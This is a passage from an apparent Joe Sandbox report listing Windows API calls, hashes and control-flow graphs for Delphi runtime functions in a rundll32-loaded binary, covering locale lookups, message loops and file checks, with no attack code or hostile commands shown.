                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 03FFE2C6
                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 03FFE2E4
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,03FFE3D0,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,03FFE3ED), ref: 03FFE324
                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,03FFE3D0,?,80000001), ref: 03FFE34F
                              • RegCloseKey.ADVAPI32(?,03FFE3D7,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,03FFE3D0,?,80000001,Software\Embarcadero\Locales), ref: 03FFE3CA
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Open$QueryValue$CloseFileModuleName
                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                              • API String ID: 2701450724-3496071916
                              • Opcode ID: 99adf7f9ae889a0aaf20457a086cc24228a5a4a0bf4888fe22aa1988ff5a3d38
                              • Instruction ID: 94a386869dd97a8a9c983a7b852aaa6efed6f522ac7365651588f640488a18c9
                              • Opcode Fuzzy Hash: 99adf7f9ae889a0aaf20457a086cc24228a5a4a0bf4888fe22aa1988ff5a3d38
                              • Instruction Fuzzy Hash: 28511079A40309BEEB20DB94CC45FAEB7ACEF18B00F544465BF14EA1B1E6B0EA409655
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • EnterCriticalSection.KERNEL32(0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF,?,?,00000000,00000000,00000000), ref: 03FFDEB2
                              • LeaveCriticalSection.KERNEL32(0424CC14,0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF,?,?,00000000,00000000), ref: 03FFDED6
                              • LeaveCriticalSection.KERNEL32(0424CC14,0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF,?,?,00000000,00000000), ref: 03FFDEE5
                              • IsValidLocale.KERNEL32(00000000,00000002,0424CC14,0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF), ref: 03FFDEF7
                              • EnterCriticalSection.KERNEL32(0424CC14,00000000,00000002,0424CC14,0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF), ref: 03FFDF54
                              • LeaveCriticalSection.KERNEL32(0424CC14,0424CC14,00000000,00000002,0424CC14,0424CC14,00000000,03FFDF98,?,?,?,00000000,?,03FFE860,00000000,03FFE8BF), ref: 03FFDF7D
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                              • String ID: en-GB,en,en-US,
                              • API String ID: 975949045-3021119265
                              • Opcode ID: 7e1c8d5333594ecb460d64b63a3295db2d71eb29082f0e586f7c2d0efa22b084
                              • Instruction ID: 9aca4e6c0991291f986473f7cba4aa354cf3e19696c7874286a1a38af8a77ebb
                              • Opcode Fuzzy Hash: 7e1c8d5333594ecb460d64b63a3295db2d71eb29082f0e586f7c2d0efa22b084
                              • Instruction Fuzzy Hash: D721A568B103016FEB15FB7EDC11A1D7685DF86A40F964565BF049F3B8CEA4EC408B62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 67 4001a04-4001a9e call 4001eb4 call 4001ec4 call 4001ed4 call 4001ee4 * 3 80 4001aa0-4001ac3 RaiseException 67->80 81 4001ac8-4001ad5 67->81 82 4001cd8-4001cde 80->82 83 4001ad7 81->83 84 4001ada-4001afa 81->84 83->84 85 4001afc-4001b0b call 4001ef4 84->85 86 4001b0d-4001b15 84->86 88 4001b18-4001b21 85->88 86->88 90 4001b23-4001b33 88->90 91 4001b3a-4001b3c 88->91 90->91 99 4001b35 90->99 92 4001b42-4001b49 91->92 93 4001bfe-4001c08 91->93 94 4001b59-4001b5b 92->94 95 4001b4b-4001b57 92->95 96 4001c18-4001c1a 93->96 97 4001c0a-4001c16 93->97 100 4001b68-4001b6a 94->100 101 4001b5d-4001b66 LoadLibraryA 94->101 95->94 102 4001c67-4001c69 96->102 103 4001c1c-4001c20 96->103 97->96 104 4001cb6-4001cbd 99->104 108 4001bb7-4001bc3 call 40012f8 100->108 109 4001b6c-4001b7b GetLastError 100->109 101->100 105 4001cb1-4001cb4 102->105 106 4001c6b-4001c7a GetLastError 102->106 111 4001c22-4001c26 103->111 112 4001c5b-4001c65 GetProcAddress 103->112 118 4001cd6 104->118 119 4001cbf-4001cce 104->119 105->104 114 4001c8a-4001c8c 106->114 115 4001c7c-4001c88 106->115 125 4001bc5-4001bc9 108->125 126 4001bf8-4001bf9 FreeLibrary 108->126 116 4001b8b-4001b8d 109->116 117 4001b7d-4001b89 109->117 111->112 120 4001c28-4001c33 111->120 112->102 114->105 122 4001c8e-4001cae RaiseException 114->122 115->114 116->108 123 4001b8f-4001bb2 RaiseException 116->123 117->116 118->82 119->118 120->112 124 4001c35-4001c3b 120->124 122->105 123->82 124->112 129 4001c3d-4001c4a 124->129 125->93 131 4001bcb-4001bd9 LocalAlloc 125->131 126->93 129->112 130 4001c4c-4001c57 129->130 130->112 132 4001c59 130->132 131->93 133 4001bdb-4001bf6 131->133 132->105 133->93
                              APIs
                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04001ABC
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: fde5b5e1d61794db1158177da92af1ed4daa7ec4ea9241c357616accccd5af01
                              • Instruction ID: c09257e7ef5ff67aa282c1410a3aa6ee2c3fa521878007fc5bba689ae7f35f5b
                              • Opcode Fuzzy Hash: fde5b5e1d61794db1158177da92af1ed4daa7ec4ea9241c357616accccd5af01
                              • Instruction Fuzzy Hash: 8AA18075A102059FEB54CFA8D884BEEB7F5EF88314F148129E515BB2C0EB75B984CB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 41e7990-41e79ab PeekMessageW 135 41e7a99-41e7aa0 134->135 136 41e79b1-41e79b5 134->136 137 41e79b7-41e79bf IsWindowUnicode 136->137 138 41e79c5 136->138 137->138 139 41e79c1-41e79c3 137->139 140 41e79c7-41e79d0 138->140 139->140 141 41e79e8-41e79fb PeekMessageA 140->141 142 41e79d2-41e79e6 PeekMessageW 140->142 143 41e79fc-41e79fe 141->143 142->143 143->135 144 41e7a04-41e7a0a 143->144 145 41e7a92 144->145 146 41e7a10-41e7a1c 144->146 145->135 147 41e7a2e-41e7a39 call 41e982c 146->147 148 41e7a1e-41e7a22 146->148 147->135 151 41e7a3b-41e7a46 call 41e7824 147->151 148->147 151->135 154 41e7a48-41e7a4c 151->154 154->135 155 41e7a4e-41e7a59 call 41e76dc 154->155 155->135 158 41e7a5b-41e7a66 call 41e772c 155->158 158->135 161 41e7a68-41e7a73 call 41e7694 158->161 161->135 164 41e7a75-41e7a80 TranslateMessage 161->164 165 41e7a8a-41e7a90 DispatchMessageA 164->165 166 41e7a82-41e7a88 DispatchMessageW 164->166 165->135 166->135
                              APIs
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 041E79A4
                              • IsWindowUnicode.USER32 ref: 041E79B8
                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 041E79DB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 041E79F1
                              • TranslateMessage.USER32 ref: 041E7A76
                              • DispatchMessageW.USER32 ref: 041E7A83
                              • DispatchMessageA.USER32 ref: 041E7A8B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                              • String ID:
                              • API String ID: 2190272339-0
                              • Opcode ID: 821458f8f5a158cd52de16a6fb59aa20c555f8a148c02809f85f5af0431925a5
                              • Instruction ID: 9cdaa4bd4f8394f1389fcf7a74c0a64236894f37afbd3ad7660b3a672cad10b2
                              • Opcode Fuzzy Hash: 821458f8f5a158cd52de16a6fb59aa20c555f8a148c02809f85f5af0431925a5
                              • Instruction Fuzzy Hash: 6F215C2C344B4275FB31766B2C80BBF53C64FC6B0CF1C889AF5A9A71C1C796B5525212
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 167 4016358-4016378 call 3ffb8b4 GetFileAttributesW 170 40163ff-4016407 GetLastError 167->170 171 401637e-4016384 167->171 172 4016429-401642b 170->172 173 4016409-401640c 170->173 174 4016394-4016398 171->174 175 4016386-401638f 171->175 176 401642f-4016436 172->176 173->172 179 401640e-4016413 173->179 177 40163c8-40163ce 174->177 178 401639a-40163b5 CreateFileW 174->178 175->176 181 40163d0-40163d2 177->181 182 40163d4-40163ef CreateFileW 177->182 178->176 180 40163b7-40163c6 CloseHandle 178->180 179->172 183 4016415-4016418 179->183 180->176 181->176 184 40163f1-40163f9 CloseHandle 182->184 185 40163fb-40163fd 182->185 183->172 186 401641a-401641d 183->186 184->176 185->176 186->172 187 401641f-4016422 186->187 187->172 188 4016424-4016427 187->188 188->172 189 401642d 188->189 189->176
                              APIs
                              • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,0422D12F,00000000,0422D1B1), ref: 0401636E
                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0422D12F,00000000,0422D1B1), ref: 040163AD
                              • CloseHandle.KERNEL32(00000000,00000000,80000000,00000001,00000000,00000003,02000000,00000000,00000000,?,?,?,?,?,0422D12F,00000000), ref: 040163B8
                              • GetLastError.KERNEL32(00000000,?,?,?,?,?,0422D12F,00000000,0422D1B1), ref: 040163FF
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: File$AttributesCloseCreateErrorHandleLast
                              • String ID:
                              • API String ID: 2927643983-0
                              • Opcode ID: b4d460509f70ea0e92052b55ac83f7fa701681a5cde35777b244f35e7de593d1
                              • Instruction ID: da00ad777d66bcba168ff1f85020b58e79ca3cfe720a9740d5c2018629f4128d
                              • Opcode Fuzzy Hash: b4d460509f70ea0e92052b55ac83f7fa701681a5cde35777b244f35e7de593d1
                              • Instruction Fuzzy Hash: 2D11E221F893142BFAB4216C2CB5BBE19C94B82368F381E2DFB54BA1F1D097B4915112
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 190 3ffa6f8-3ffa705 191 3ffa70c-3ffa740 GetCurrentThreadId 190->191 192 3ffa707 190->192 193 3ffa744-3ffa770 call 3ffa5dc 191->193 194 3ffa742 191->194 192->191 197 3ffa779-3ffa780 193->197 198 3ffa772-3ffa774 193->198 194->193 199 3ffa78a-3ffa790 197->199 200 3ffa782-3ffa785 197->200 198->197 201 3ffa776 198->201 202 3ffa795-3ffa79c 199->202 203 3ffa792 199->203 200->199 201->197 204 3ffa79e-3ffa7a5 202->204 205 3ffa7ab-3ffa7af 202->205 203->202 204->205 206 3ffa7b5 call 3ffa68c 205->206 207 3ffaa44-3ffaa5e 205->207 212 3ffa7ba 206->212 209 3ffaa71-3ffaa78 207->209 210 3ffaa60-3ffaa6c call 3ffa924 call 3ffa9ac 207->210 213 3ffaa9b-3ffaa9f 209->213 214 3ffaa7a-3ffaa85 GetCurrentThreadId 209->214 210->209 215 3ffaab9-3ffaabd 213->215 216 3ffaaa1-3ffaaa5 213->216 214->213 218 3ffaa87-3ffaa96 call 3ffa5fc call 3ffa980 214->218 220 3ffaabf-3ffaac2 215->220 221 3ffaac9-3ffaacd 215->221 216->215 219 3ffaaa7-3ffaab7 216->219 218->213 219->215 220->221 224 3ffaac4-3ffaac6 220->224 225 3ffaacf-3ffaad8 call 3ff6f7c 221->225 226 3ffaaec-3ffaaf5 call 3ffa624 221->226 224->221 225->226 237 3ffaada-3ffaaea call 3ff8ea8 call 3ff6f7c 225->237 235 3ffaafc-3ffab01 226->235 236 3ffaaf7-3ffaafa 226->236 238 3ffab1d-3ffab28 call 3ffa5fc 235->238 239 3ffab03-3ffab11 call 3ffeaec 235->239 236->235 236->238 237->226 249 3ffab2d-3ffab31 238->249 250 3ffab2a 238->250 239->238 248 3ffab13-3ffab15 239->248 248->238 253 3ffab17-3ffab18 FreeLibrary 248->253 251 3ffab3a-3ffab3d 249->251 252 3ffab33-3ffab35 call 3ffa980 249->252 250->249 255 3ffab3f-3ffab46 251->255 256 3ffab56-3ffab67 251->256 252->251 253->238 257 3ffab4e-3ffab51 ExitProcess 255->257 258 3ffab48 255->258 256->215 258->257
                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 03FFA72F
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 587a33140075139fedd12386af3a75f9adc2ae14cac85ffcab6d23ab72efbd07
                              • Instruction ID: eba622274b62900e010232b038ea43a963660af39b029db44897bd12da50f3f4
                              • Opcode Fuzzy Hash: 587a33140075139fedd12386af3a75f9adc2ae14cac85ffcab6d23ab72efbd07
                              • Instruction Fuzzy Hash: 5B519B78A003468FDF25EF69D88875A7BE4EF48314F1885A9EE0D8B261D774D888CF15
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 259 41e7bd4-41e7bec 260 41e7bee-41e7bfd call 3ff92b4 259->260 261 41e7bff-41e7c01 259->261 260->261 265 41e7c03 260->265 263 41e7c05-41e7c79 261->263 269 41e7cef-41e7d03 263->269 270 41e7c7b-41e7c8b call 3ff9194 263->270 265->263 271 41e7d05-41e7d15 call 3ff9194 269->271 272 41e7d21 269->272 270->269 277 41e7c8d-41e7ca7 call 4130ce4 270->277 271->272 278 41e7d17-41e7d1a 271->278 281 41e7ca9-41e7ccc GetWindowLongW SetWindowLongW 277->281 282 41e7cd1-41e7cea call 41da980 277->282 278->272 281->282 282->269
                              APIs
                              • GetWindowLongW.USER32(?,000000EC), ref: 041E7CB5
                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 041E7CCC
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: LongWindow
                              • String ID:
                              • API String ID: 1378638983-0
                              • Opcode ID: 45dfc532025320b14d10bc3aae2c6ec84784170f7bfee7d5343f2d53e860d58b
                              • Instruction ID: 737bf3a8025198078bb9e8fb1403c30440adb74ed87250864d44a1fe105f448b
                              • Opcode Fuzzy Hash: 45dfc532025320b14d10bc3aae2c6ec84784170f7bfee7d5343f2d53e860d58b
                              • Instruction Fuzzy Hash: 87414D34A04648EFEB05DF69D8C4AADB7F6FB49714F2185E5E810AB3A1C734AE41DB10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetUserDefaultUILanguage.KERNEL32(00000000,03FFE8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03FFE946,00000000,?,00000105), ref: 03FFE853
                              • GetSystemDefaultUILanguage.KERNEL32(00000000,03FFE8BF,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,03FFE946,00000000,?,00000105), ref: 03FFE87B
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: DefaultLanguage$SystemUser
                              • String ID:
                              • API String ID: 384301227-0
                              • Opcode ID: 6648271557f535f6b736933fb11fafddd922c177fbef3d4e999c39105b12dd94
                              • Instruction ID: 76301d57a2e083cea50b32bc637c1f2ea17c8c91b3f995227da252cceacf9b5e
                              • Opcode Fuzzy Hash: 6648271557f535f6b736933fb11fafddd922c177fbef3d4e999c39105b12dd94
                              • Instruction Fuzzy Hash: E1312D38E1020A9FDF11FF98CD80AAEB7B5EF54600F5444A5DE14AB270DB74AD41CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,03FFE986,?,03FF0000,04241C1C), ref: 03FFE908
                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,03FFE986,?,03FF0000,04241C1C), ref: 03FFE959
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860044790.0000000004241000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860069598.0000000004247000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860092185.0000000004248000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860119452.000000000424F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860154622.0000000004253000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860178818.0000000004255000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004256000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3860200243.0000000004258000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_3ff0000_rundll32.jbxd
                              Similarity
                              • API ID: FileLibraryLoadModuleName
                              • String ID:
                              • API String ID: 1159719554-0
                              • Opcode ID: cf8a846a09add652b4b870bc4b7da1b8e8d03eb5b5bc37489eed50f1b739fb30
                              • Instruction ID: fe208db4995e12dc42dfe5a77853b79331d74cd0c315ef6f831f22d1b04ac7d6
                              • Opcode Fuzzy Hash: cf8a846a09add652b4b870bc4b7da1b8e8d03eb5b5bc37489eed50f1b739fb30
                              • Instruction Fuzzy Hash: A6115174A4031CAFDB24EF60CC85BDDB3B8DF14700F5145A5AA08AB2B0DA745F84CEA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CompareStringW.KERNEL32(0000007F,00000001,00000000,00000000,00000000,00000000,00000000,03FF8CEA,?,?,?,00000000), ref: 03FF8CC9
                              Memory Dump Source
                              • Source File: 0000000D.00000002.3859788011.0000000003FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 03FF0000, based on PE: true
                              • Associated: 0000000D.00000002.3859769153.0000000003FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000000D.00000002.3859788011.000000000400C000.00000020.00000001.01000000.00000003.sdmpDownload File
